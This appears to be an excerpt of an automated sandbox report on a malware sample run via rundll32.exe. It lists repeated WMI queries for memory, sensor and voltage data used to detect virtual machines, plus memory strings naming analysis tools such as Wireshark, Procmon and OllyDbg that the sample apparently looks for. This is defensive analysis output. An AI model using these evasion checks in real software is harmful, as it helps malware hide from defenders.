    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Queries temperature or sensor information (via WMI often done to detect virtual machines)
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_NumericSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Sensor
    Queries voltage information (via WMI often done to detect virtual machines)
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_VoltageSensor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VoltageProbe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237918818.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEACADEMY.COM
    Source: rundll32.exe, 0000000D.00000003.2561299847.0000025BF00DA000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488206053.0000025BF00D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEEEEEP161.EXEE
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEE.EXEEE
    Source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXESSNAMEYTOOLSE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXEP
    Source: rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXED
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXERONCLASSNAMEST
    Source: rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488206053.0000025BF00D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
    Source: rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEXE
    Source: rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEVEL LEVEL="ASJ
    Source: rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461727840.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522294812.0000025BF016E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE]
    Source: rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEXE
    Source: rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935290329.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEMON.EXE.EXEEE
    Source: rundll32.exe, 0000000D.00000002.3521533171.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEX @|[
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEEXEE.EXEEXE
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE`3
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
    Source: rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXERTSECURITYLS
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461727840.0000025BF016B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEK.EXE
    Source: rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE.
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXEECURITYTOOLS
    Source: rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEEXECXEEEXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
    Source: rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE@
    Source: rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE P
    Source: rundll32.exe, 0000000D.00000002.3521533171.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE@
